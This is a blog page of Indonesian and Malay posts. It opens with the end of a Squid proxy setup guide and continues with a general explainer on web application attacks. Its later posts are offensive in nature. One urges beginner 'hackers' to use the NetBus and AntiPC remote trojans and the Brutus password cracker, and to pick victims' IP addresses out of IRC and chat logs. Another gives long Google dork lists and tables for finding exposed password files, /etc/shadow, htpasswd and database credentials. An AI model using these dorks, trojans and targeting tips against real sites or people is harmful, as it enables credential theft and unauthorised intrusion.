delay_class 2 2
delay_parameters 2 -1/-1 -1/-1
delay_access 2 allow nodelay
# Delay Pool number 3 of class 2 for local network THROTTLED to 4K for non local
# services.
delay_class 3 2
delay_parameters 3 15000/15000 4000/4000
delay_access 3 allow capped
———————————————————————————–
13. Untuk pengetahuan anda, proxy server ini di bind pada port 1616 (Pastikan port itu belum
diguna oleh mana-mana service sebelum anda bind!)
14. cd semula ke directory /usr/local/squid/etc/
15. Taip command berikut:
root@crap:etc:# touch noaccess.dat
root@crap:etc:# touch fullspeed.dat
16. Isikan perkara berikut pada file noaccess.dat
# LAMAN WEB TERLARANG
.sex.com
.porn.com
nota: Ini sebenarnya adalah untuk melarang semua pengguna dari memasuki laman web
yang bermula dari domain tersebut atas sebab tertentu.
17. Isikan perkara berikut pada file fullspeed.dat
# LAMAN WEB YANG DIGALAKKAN
.ded1.org
.mybsd.org.my
nota: Ini sebenarnya adalah untuk memberi laluan tanpa DELAY dan FULL SPEED kepada
pengguna ketika memasuki laman web bermula dari domain tersebut.
18. adduser yang bernama squid dan group squid
19. Kemudian buat pula directory cache dan swap untuk squid
root@crap:etc:# mkdir /etc/cache
root@crap:etc:# chown /etc/cache
root@crap:etc:# chgrp /etc/cache
20. Set agar menggunakan transparent proxy dengan ipfilter (pastikan server telah diinstall & jalan
dengan IPF)
Edit /etc/rc.conf
# Tambahkan benda berikut
ipfilter_enable=”YES”
ipnat_enable=”YES”
ipmon_enable=”YES”
ipfs_enable=”YES”
Edit /etc/ipnat.rules
# Tambahkan benda berikut; xl0 merupakan NIC
# dalaman
# Redirect segalanya kepada squid pada port 1616
rdr xl0 0/0 port 80 -> 127.0.0.1 port 1616 tcp
21. Flush network pada server itu.
22. Start squid daemon.
root@crap:etc:# /usr/local/squid/sbin/squid -z
23. Untuk melihat sama ada squid berjalan atau tidak, sila tengok log:
root@crap:etc:# tail -f /usr/local/squid/var/logs/access.log
1066927464.436 254 202.188.77.9 TCP_MISS/200 2779 GET http://www.mybsd.org.my/news/comments.php? - DIRECT/202.157.183.150 text/html
1066927476.791 1129 202.188.77.9 TCP_MISS/200 4836 GET http://www.google.com.my/ - DIRECT/216.239.33.99 text/html
1066927477.088 488 202.188.77.9 TCP_MISS/200 3226 GET http://www.google.com.my/images/hp1.gif - DIRECT/216.239.33.99 image/gif
1066927477.096 495 202.188.77.9 TCP_MISS/200 2975 GET http://www.google.com.my/images/hp2.gif - DIRECT/216.239.33.99 image/gif
1066928975.012 0 202.188.77.9 TCP_DENIED/403 1369 GET http://www.sex.com - NONE/- text/html
24. Cara yang paling mudah untuk menentukan sama ada squid berjalan atau tidak, gunakan netstat.
root@crap:etc:# netstat -an | grep 1616
tcp4 0 0 *.1616 *.* LISTEN
Nota: Keputusan di atas menunjukkan squid daemon berjalan dan LISTEN pada port 1616 (port di mana kita bind squid
seperti yang di set pada squid.conf)
25. Siap.
Sekarang mesin anda telah siap sebagai transparent proxy server yang menggunakan squid.
Sekian.
- ded1
Posted by M. Thoyib HM at 6:58 PM 0 comments
Bagaimana Hacker Menembus sistem keamanan website Anda
Saat ini, Firewall, Security Scanner, dan anti virus software hampir melindungi semua jaringan komputer di dalam suatu perusahaan.Walaupun dengan perlindungan tersebut, seorang hacker melakukan studi tersendiri, dan mempelajari cara lain untuk menembus, mengubah, dan mengambil data penting di dalam suatu perusahaan.
Dan sayangnya mereka menemukan cara lain tersebut untuk menembus keamanan data perusahaan, yakni melalui sebuah aplikasi Website perusahaan itu sendiri.
Aplikasi Website bisa di akses secara publik melalui internet, 24 jam sehari, 7 hari seminggu. Hal ini menyebabkan seorang hacker bisa melakukan percobaan hacking tanpa batas untuk menembus aplikasi website tersebut dengan tujuan yang bermacam-macam. ada yang semata-mata untuk menguji kemampuan hackingnya, ada yang bertujuan untuk mengubah, dan mengambil data penting , misalnya mengambil informasi data customer di perusahaan tersebut.
Pete Lindstrom, Seorang Director of Security Strategies with the Hurwitz Group mengatakan :
” Aplikasi website saat ini, adalah bagian dan struktur yang paling lemah di dalam suatu perusahaan”.
Apa itu aplikasi website ?
- Aplikasi website adalah suatu aplikasi yang berada di dalam server suatu perusahaan, dimana setiap orang
bisa mengakses dan melihatnya melalui internet maupun intranet.
Aplikasi website terdiri dari 3 bagian aplikasi :
Bagian pertama adalah aplikasi browser, semacam : internet explorer, mozzila, firefox, opera, dan lain-lain.
Bagian kedua adalah aplikasi yang menghandle permintaan data ke server oleh browser tersebut, contohnya seperti : ASP ( active server pages ) , Java servlets, dan lain-lain.
Bagian ketiga : adalah database dari aplikasi website tersebut yang berfungsi sebagai penyedia data, dan juga penyimpan data atas permintaan dari aplikasi bagian kedua tadi.
Contoh-contoh Aplikasi website adalah : Shopping cart, Formulir order, halaman login, Forum, Blogs, dan lain-lain.
Modus Operandi, Bagaimana Hacker Menembus sistem keamanan website Anda.
Seorang hacker yang ingin melakukan serangan ke sebuah situs, mereka mempunyai tahap-tahap dalam melakukan hacking, modus operandi mereka selalu hampir sama. sebagian besar adalah :
1. Mengumpulkan Informasi.
ini adalah tahap awal untuk melakukan hacking, Hacker biasanya mengumpulkan informasi-informasi terhadap target terlebih dahulu, misalnya mencari informasi terhadap Operating System terhadap server target tersebut, apakah target memakai server berbasikan linux, atau window. Juga melakukan Port scanning pada website tersebut, untuk mengetahui port tersebut di gunakan untuk apa saja, dan port apa saja yang terbuka. lalu memeriksa aplikasi dari server tersebut.
misalnya apakah menggunakan PHP, atau CGI, atau ASP sebagai bahasa program untuk aplikasi situsnya.
2. Melakukan Survey
.
Jika sudah mendapatkan informasi-informasi tersebut di atas, hacker akan melakukan survey untuk mencari kelemahan terhadap informasi yang dia dapat tadi, apakah memiliki kelemahan atau tidak.
3. Memeriksa Input Validation.
Bila sudah di tahap ini, hacker akan melakukan uji coba atas input validation yang di gunakan website tersebut. dan mencari tahu, Input apa yang di butuhkan oleh server tersebut agar bisa melakukan perubahan.
4. Memulai Serangan.
Setelah mengumpulkan informasi terhadap situs target, maka hacker akan memulai serangannya.
Metode serangan favorit yang sering di lakukan oleh hacker
SQL Injection : Penyerang akan menjalankan perintah SQL melalui website tersebut, ini bisa di lakukan dengan dua cara, yakni melalui pengeditan Form , atau pun melalui pengeditan link url.
Cross site scripting ( CSS attack ) : Dengan serangan ini, Input yang di masukan pengguna lainnya dalam website tersebut akan di transfer ke website nya si penyerang.
Directory traversal Attack : Juga di kenal dengan ../ ( dot dot slash ) attack. Dengan serangan ini, directory yang tadinya tidak bisa di lihat ( forbiden ) akan bisa di akses. Dengan cara melakukan penambahan ../ di link target.
Parameter manipulation : Melakukan manipulasi terhadap data yang di transfer antara browser dengan aplikasi website tersebut. hal ini bisa di lakukan dengan beberapa cara :
- Cookie manipulation : Cookie yang menyimpan data login dalam suatu sesi, dengan adanya cookie, seorang user tidak perlu lagi melakukan login ke website tersebut, selama dia belum melakukan logout. karena cookie ini di simpan di dalam komputer klient, penyerang dengan mudah memanipulasi data cookie tersebut.
- HTTP Header Manipulation : HTTP headers yang mengontrol informasi dari jaringan klien ke server situs, di karenakan HTTP header ini berasal dari komputer client ( pelanggan ) . Penyerang dengan mudah mengubah dan memanipulasi data tersebut.
- HTLM Form Field manipulation : Sebuah form login, form pendaftaran, Form transfer, yang biasanya ada di suatu situs bisa di modifikasi dengan mudah, dan melancarkan serangan dengan memakai form yang sudah di ubah tersebut.
- URL manipulation : Sebuah situs yang menampilkan parameter perintah di bagian link situs tersebut di browser, akan dengan mudah di baca oleh penyerang tersebut untuk melakukan perubahan.
- Directory enumeration : Menganalisa directori dan struktur dari website tersebut, dan mencari directory tersembunyi, maupun mencari direktori yang memiliki write akses.
Dan masih banyak lagi metode serangan lainnya seperti :
File Inclusion, Script Source Code Disclosure, CRLF Injection Cross Frame Scripting (XFS), PHP Code Injection, XPath Injection, LDAP Injection, Blind SQL/XPath Injection, Authentication attacks, Buffer overflows.
Beberapa kejadian akibat bisa di tembus nya aplikasi website suatu perusahaan.
- Pada tahun 2000, seorang remaja berumur 17 tahun yang berasal dari norwegia, menembus sebuah bank lokal terkenal di negaranya. Pada saat dia sedang melakukan transaksi online di bank tersebut, dia menyadari bahwa aplikasi website ini menggunakan nomor accountnya sebagai bagian parameter di link url. Kemudian dia mencoba memasukkan secara acak nomor account lainnya di link url tersebut, dan hasilnya data account bank yang dia tulis tersebut muncul di layar komputernya lengkap dengan informasi detail lainnya.
- Pada tanggal 31 oktober 2001, Website Acme Art Inc, berhasil di tembus dan informasi kartu kredit customer yang pernah melakukan order lewat website ini di ambil, dan di tampilkan di Usenet Groups. Informasi hacking ini pun di beritakan kembali oleh media secara gencar, yang membuat perusahaan tersebut mengalami kerugian ratusan ribuan dollar di karenakan kehilangan kepercayaan customernya, dan banyak yang membatalkan order pembeliannya.
Perusahaan ini juga kehilangan pinjaman keduanya, yang di batalkan secara sepihak oleh Venture Capital Firm.
- Pada bulan juni 2003, Perusahaan Fashion dengan merk Guess, dan pet supply retailer PetCo. Keamanan website mereka di tembus dan sebagai hasilnya, hampir setengah juta data informasi kartu kredit customernya di curi.
- Di Indonesia sendiri, tentu kita masih ingat dengan situs KPU ( komisi pemilihan umum ), yang di serang dengan metode SQL injection. Yang mengakibatkan nama-nama partai yang ada di situs tersebut berubah.
- Choice Point inc, akibat tindakan hacking yang dilakukan seseorang, mengalami kerugian kurang lebih 15 Juta dollar
- University of Southern California ($140k +)
- Microsoft (Website defacement)
- PayPal (Account information stolen; cost unknown)
- Victoria’s Secret ($50k fine)
- Hotmail (Vulnerability detected – not fixed)
- Amazon (Vulnerability detected – not fixed)
- Petco (credit cards of 500k customers stolen)
Posted by M. Thoyib HM at 6:56 PM 0 comments
menjadi hacker pemula dgn bantuan Tools
banyak orang bilang kalo hacking itu jahat..tapi kalo menurut aku nggaak tergantung niatnya aja…….so gimana menjadi hacker pemula
yang pertama itu download tools-tools dibawah ini:
Alat Bantu Dasar:
1. Smart WhoIs: Satu link utk mengetahui IP address suatu website dan servernya
http://www.all-nettools.com/toolbox.
Fungsi menemukan target (IP address) dari suatu website
Cukup ketik nama situs (tanpa www) misal: gamexeon.com dan klik go akan memberikan info:
gamexeon.com (216.32.66.242)
216.32.0.0 - 216.35.255.255
Savvis
3300 Regency Parkway
Cary, NC
US
US IP Address Administration
ipadmin@savvis.net
+1-888-638-6771
216.32.64.0 - 216.32.95.255
Layered Technologies, Inc.
18816 Preston Road
Suite #100
Dallas, TX
US
LT IP-Network Team
ipnet@layeredtech.com
+1-972-398-7998
Ternyata server GX ada di US yah… susah ditembus nih kayaknya.
2. Net Tools: Alat bantu hacking serbaguna/lengkap utk pemula
http://users.pandora.be/ahmadi
Fungsi: Mail Bombing, Port Flooding, Ping session, Port scanning, IP sniffer, Website scanner, Masking IP.
Cukup lengkap utk pemula utk melacak IP org lain yg sedang aktif (di sekitar anda). Jika sudah ketemu terus bisa discan port apa aja yg terbuka.
3. Happy Browser THC: utk memeriksa vulnerability/hole pada suatu website.
(link not included)
4. Brutus: Password *****er: utk menghack pasword (utk login atau password administrator) shg bisa masuk ke suatu website dengan bebas..
(link not included)
5. NetBus: remote trojan utk masuk ke dalam komputer org lain, menghapus, mengirim dan mengambil file, menjalankan aplikasi,
mengintip program yg sedang dijalankan, menampilkan gambarx2, melihat apa yg sedang diketik, mengirim pesan, mematikan komputer, dll. Port yang dilacak yaitu 12345.. ingat yaaa cari versi terbaru netbus di google…
(link not included)
6. AntiPC Trojan: remote trojan utk masuk ke dalam komputer org lain, mengirim email dari komputer target, menghapus, memboot-ulang, men-shutdown, membuat komputer hang/crash, dll
(link not included)
Segitu dulu (yg aku tahu/hasil nyontek hehehe)…
Kalo mo tahu IP address cari dari IRC:
misal ketik:
WHO #INDONESIA dari jendela status MIRC akan menampilkan daftar alamat IP peserta chat room di channel #Indoneisa.
Memeriksa operating system di Mirc: sorot [nickname], CCTP, Version akan menampilkan versi mirc yg digunakan oleh [nickname].
Jika keluar [nickname] VERSION reply]: mirc vx.xx Khaled Mardam-Bey (KMB) artinya org tsb menggunakan Windows OS karena mirc KMB hanya jalan di Windows OS. Akan tetapi, jika keluar … by Linux…. maka this is not ur target for windows hacking…..
Just curious: Berapa banyak komputer warnet yg pake Linux ato OS selain Windows yah….????
Cara lain mencari IP korban:
Ketika sedang chat di YM (browser dimatikan) biasanya IP address para YM chatter (khususnya yg udah kemasukan spyware lain/berusaha menyebar) mesti berusaha masuk dan keliatan di log historynya firewall.
Ini bisa dimasukkan ke dalam daftar target…. itung x2 nambah 1 spyware/trojan khan nggak pengaruh buat dia . sekian dulu postingan aku mudah-mudahan bermanfaat bagi pembaca..
apabila ada pertanyyaan kirim ke emailku aja
Posted by M. Thoyib HM at 6:55 PM 0 comments
trik paman google
Ditulis oleh oyib di/pada Desember 17, 2007
Pada kesempatan ini akan dipaparkan penggunaan mesin pencari informasi Google, untuk mendapatkan informasi yang tersembunyi dan sangat penting. Dimana informasi tersebut tidak terlihat melalui metode pencarian biasa. Artikel ini berdasarkan pada FAQ dan diskusi pada milis situs keamanan jaringan komputer http://bugtraq.org dan http://insecure.org tentang metode pengumpulan informasi berkaitan dengan aktifitas webhacking .
Kecenderungan penggunaan teknik ini pada awalnya digunakan untuk mendapatkan informasi sebanyak banyaknya kepada target mesin ataupun mendapatkan hak akses yang tidak wajar. Pencarian informasi secara akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan, semoga saja paparan ini digunakan untuk tujuan mencari informasi dengan tujuan yang tidak destruktif, tetapi ialah untuk membantu pencarian informasi yang tepat, cepat dan akurat untuk tujuan yang baik dan bermanfaat.
Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.
” Intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang
dimaksud. Sebagai contoh pada pencarian, “intitle:
password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .
Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.
“ inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.
Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut.
Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.
“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.
“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:
“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org
“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : “filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.
“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.
“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.
Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.
“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.
Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.
Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .
Sintaks “Index of ” dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.
Webserver dengan indeks browsing yang dapat diakses, berarti siapa saja dapat melakukan akses pada direktori webserver, seperti layaknya dapat dilakukan pada lokal direktori pada umumnya.
Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya.
Dibawah ini merupakan beberapa contoh penggunaan sintaks “ indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.
ex :
Index of /admin
Index of /passwd
Index of /password
Index of /mail
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
“Index of /secret”
“Index of /confidential”
“Index of /root”
“Index of /cgi-bin”
“Index of /credit-card”
“Index of /logs”
“Index of /config”
“Index of/admin.asp
“Index of/login.asp
Mencari sistem atau server yang vulnerable menggunakan sintaks “inurl:” atau “allinurl:”
1. Menggunakan sintaks “allinurl:winnt/system32/” (dengan tanda petik ) akan menampilkan daftar semua link pada server yang memberikan akses pada direktori yang terlarang seperti “system32”. Terkadang akan didapat akses pada cmd.exe pada direktori “system32” yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.
2. Menggunakan “allinurl:wwwboard/passwd.txt” ( dengan tanda petik ) akan menampilkan daftar semua link pada server yang memiliki kelemahan pada “wwwboard Password”. Pembahasan lebih lanjut tentang vulnerability “wwwboard Password” dapat dilihat pada site keamanan jaringan seperti http://www.securityfocus.com atau http://www.securitytracker.com
3. Menggunakan sintaks “inurl: bash history” (dengan tanda petik ) akan menampilkan daftar link pada server yang memberikan akses pada file “bash history” melalui web. File tersebut merupakan command history file yang mengandung daftar perintah yang dieksekusi oleh administrator, yang terkadang menyangkut informasi sensitive seperti password sistem. Seringkali password pada sistem telah dienkripsi, untuk mendapatkan password aslinya bentuk yang dienkripsi ini harus didekripsi menggunakan program password cracker. Lama waktu untuk mendapatkan hasil dekripsi tergantung dari keandalan program dan banyaknya karakter yang terenkripsi.
4. Menggunakan “inurl:config.txt” (dengan tanda petik) akan menampilkan daftar semua link pada server yang memberikan akses pada file “config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database.
Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :
Inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:”wwwroot/*.”
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls “restricted”
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery
Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks “intitle:”
atau “allintitle:”
1. Menggunakan allintitle: “index of /root” ( tanpa tanda kutip ) akan menampilkan
Daftar link pada webserver yang memberikan akses pada direktori yang terlarang seperti direktori root.
2. Menggunakan allintitle: “index of /admin” ( tanpa tanda kutip ) akan menampilkan link pada site yang memiliki indeks browsing yang dapat diakses untuk direktori terlarang seperti direktori “admin”.
Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :
intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*
Penggunaan dan kombinasi pada sintaks tidak hanya terbatas pada contoh paparan diatas. Masih banyak lagi kombinasi dari sintaks sintaks dengan berbagai kata kunci yang dapat digunakan. Hal tersebut bergantung pada kreativitas dan kemauan untuk mencoba. Ada baiknya penggunaan wacana yang telah dipaparkan ini digunakan untuk kepentingan yang tidak menimbulkan kerugian atau kerusakan.
Kelemahan pada suatu sistem atau server yang diketahui ada baiknya dilakukan sharing dengan administrator sistem yang bersangkutan sehingga dapat bermanfaat bagi semua pihak. Dikarenakan kemungkinan besar hasil dari pencarian informasi dapat memberikan informasi yang sensitive, yang seringkali menyangkut segi keamanan suatu sistem atau server.
Wacana tentang sintaks yang sangat membantu dalam pencarian informasi tersebut akhirnya tergantung pada niat dan tujuan dalam pencarian data. Apakah sungguh sungguh dilakukan untuk kebutuhan pencarian data, mengumpulkan informasi dari suatu mesin target penetrasi. Tujuan akhirnya bergantung pada niat individu yang bersangkutan sehingga penulis tidak bertanggung jawab terhadap penyalahgunaan dari informasi yang telah dipaparkan. Seperti kata pepatah lama “ resiko ditanggung penumpang
Posted by M. Thoyib HM at 6:53 PM 0 comments
Ditulis oleh oyib di/pada Desember 17, 2007
Google sebagai web pencarian no 1 saat ini memang belum ada duanya. teknik pencarian dengan penggunaan macam tipe dan operator membuat user dapat membuat berbagai macam variasi pencarian. kita tidak akan membahas berbagai macam operator tersebut, karena judul artikel ini mendapatkan password dan username.
semua tabel dalam artikel ini diambil dari buku
“google hacking for penetration testers”, mungkin ada temen2 yang belum sempet baca jadi saya tulis aja biar semua bisa menikmati. biar temen2 yang masih newbie tidak terheran heran jika seseorang bisa mendapatkan banyak passworddari website. jadi gak usah heran….
TABEL KATA KATA KUNCI MENDAPATKAN USERNAMES
———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:admin inurl: |userlist Generic userlist files
———————————————————
inurl:admin filetype: |asp Generic userlist files
inurl:userlist |
———————————————————
inurl: |Half-life statistics file, lists username and
hlstats intext: |other information
Server Username |
———————————————————
filetype:ctl |
inurl:haccess. |Microsoft FrontPage equivalent of htaccess
ctl Basic |shows Web user credentials
———————————————————
filetype:reg |
reg intext: |Microsoft Internet Account Manager can
———————————————————
”internet account manager” |reveal usernames and more
filetype:wab wab |Microsoft Outlook Express Mail address
|books
———————————————————
filetype:mdb inurl:profiles |Microsoft Access databases containing
|profiles.
———————————————————
index.of perform.ini |mIRC IRC ini file can list IRC usernames and
|other information
———————————————————
inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be
|used to discover usernames
———————————————————
filetype:conf inurl:proftpd. |PROFTP FTP server configuration file
conf –sample |reveals
|username and server information
———————————————————
filetype:log username putty |PUTTY SSH client logs can reveal
|usernames
|and server information
———————————————————
filetype:rdp rdp |Remote Desktop Connection files reveal user
|credentials
———————————————————
intitle:index.of |UNIX bash shell history reveals commands
.bash_history |typed at a bash command prompt; usernames
|are often typed as argument strings
———————————————————
intitle:index.of |UNIX shell history reveals commands typed at
.sh_history |a shell command prompt; usernames are
|often typed as argument strings
———————————————————
“index of ” lck |Various lock files list the user currently using
|a file
———————————————————
+intext:webalizer +intext: |Webalizer Web statistics page lists Web user-
Total Usernames +intext: |names and statistical information
”Usage Statistics for”
———————————————————
filetype:reg reg HKEY_ |Windows Registry exports can reveal
CURRENT_USER |username usernames and other information
———————————————————
TABEL KATA-KATA KUNCI MENDAPATKAN PASSWORD
———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:/db/main.mdb |ASP-Nuke passwords
———————————————————
filetype:cfm “cfapplication |ColdFusion source with potential passwords
name” password
———————————————————
filetype:pass |dbman credentials
pass intext:userid
———————————————————
allinurl:auth_user_file.txt |DCForum user passwords
———————————————————
eggdrop filetype:user user |Eggdrop IRC user credentials
———————————————————
filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials
———————————————————
filetype:url +inurl:”ftp://” |FTP bookmarks cleartext passwords
+inurl:”@”
———————————————————
inurl:zebra.conf intext: |GNU Zebra passwords
password -sample -test
-tutorial –download
———————————————————
filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
htpasswd.bak
———————————————————
“http://*:*@www” bob:bob |HTTP passwords (bob is a sample username)
———————————————————
“sets mode: +k” |IRC channel keys (passwords)
———————————————————
“Your password is * |Remember IRC NickServ registration passwords
this for later use”
———————————————————
signin filetype:url |JavaScript authentication credentials
———————————————————
LeapFTP intitle:”index.of./” |LeapFTP client login credentials
sites.ini modified
———————————————————
inurl:lilo.conf filetype:conf |LILO passwords
password -tatercounter2000
-bootpwd –man
———————————————————
filetype:config config intext: |Microsoft .NET application credentials
appSettings “User ID”
———————————————————
filetype:pwd service |Microsoft FrontPage Service Web passwords
———————————————————
intitle:index.of |Microsoft FrontPage Web credentials
administrators.pwd
———————————————————
“# -FrontPage-” |Microsoft FrontPage Web passwords
inurl:service.pwd
ext:pwd inurl:_vti_pvt inurl: |Microsoft FrontPage Web passwords
(Service | authors | administrators)
———————————————————
inurl:perform filetype:ini |mIRC nickserv credentials
———————————————————
intitle:”index of” intext: |mySQL database credentials
connect.inc
———————————————————
intitle:”index of” intext: |mySQL database credentials
globals.inc
———————————————————
filetype:conf oekakibbs |Oekakibss user passwords
———————————————————
filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials
———————————————————
inurl:ospfd.conf intext: |OSPF Daemon Passwords
password -sample -test
-tutorial –download
———————————————————
index.of passlist |Passlist user credentials
———————————————————
inurl:passlist.txt |passlist.txt file user credentials
———————————————————
filetype:dat “password.dat” |password.dat files
———————————————————
inurl:password.log filetype:log |password.log file reveals usernames,
|passwords,and hostnames
———————————————————
filetype:log inurl:”password.log” |password.log files cleartext
|passwords
———————————————————
inurl:people.lst filetype:lst |People.lst generic password file
———————————————————
intitle:index.of config.php |PHP Configuration File database
|credentials
———————————————————
inurl:config.php dbuname dbpass |PHP Configuration File database
|credentials
———————————————————
inurl:nuke filetype:sql |PHP-Nuke credentials
———————————————————
filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials
“USER.PASS=”
———————————————————
filetype:ini ServUDaemon |servU FTP Daemon credentials
———————————————————
filetype:conf slapd.conf |slapd configuration files root password
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
———————————————————
filetype:sql “IDENTIFIED BY” –cvs |SQL passwords
———————————————————
filetype:sql password |SQL passwords
———————————————————
filetype:ini wcx_ftp |Total Commander FTP passwords
———————————————————
filetype:netrc password |UNIX .netrc user credentials
———————————————————
index.of.etc |UNIX /etc directories contain
|various credential files
———————————————————
intitle:”Index of..etc” passwd |UNIX /etc/passwd user credentials
———————————————————
intitle:index.of passwd |UNIX /etc/passwd user credentials
passwd.bak
———————————————————
intitle:”Index of” pwd.db |UNIX /etc/pwd.db credentials
———————————————————
intitle:Index.of etc shadow |UNIX /etc/shadow user credentials
———————————————————
intitle:index.of master.passwd |UNIX master.passwd user credentials
———————————————————
intitle:”Index of” spwd.db |UNIX spwd.db credentials
passwd -pam.conf
———————————————————
filetype:bak inurl:”htaccess| |UNIX various password file backups
passwd|shadow|htusers
———————————————————
filetype:inc dbconn |Various database credentials
———————————————————
filetype:inc intext:mysql_ |Various database credentials, server names
connect
———————————————————
filetype:properties inurl:db |Various database credentials, server names
intext:password
———————————————————
inurl:vtund.conf intext:pass –cvs |Virtual Tunnel Daemon passwords
———————————————————
inurl:”wvdial.conf” intext: |wdial dialup user credentials
”password”
———————————————————
filetype:mdb wwforum |Web Wiz Forums Web credentials
———————————————————
“AutoCreate=TRUE password=*” |Website Access Analyzer user passwords
———————————————————
filetype:pwl pwl |Windows Password List user credentials
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”defaultusername” intext: |credentials
”defaultpassword”
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”internet account manager” |credentials
———————————————————
“index of/” “ws_ftp.ini” |WS_FTP FTP credentials
“parent directory”
———————————————————
filetype:ini ws_ftp pwd |WS_FTP FTP user credentials
———————————————————
inurl:/wwwboard |wwwboard user credentials
———————————————————
mungkin temen2 ada yang ingin melihat password dari website jerman?
mungkin sebaiknya kita juga mengganti kata “password” dengan memakai bahasa jerman tentunya dibawah ini adalah tabel 5 negara beserta terjemahan password dalam bahasa masing2 negara.
—————————————————–
BAHASA |KATA-KATA| TRANSLATE
—————————————————–
German |password | Kennwort
Spanish |password | contraseña
French |password | mot de passe
Italian |password | parola d’accesso
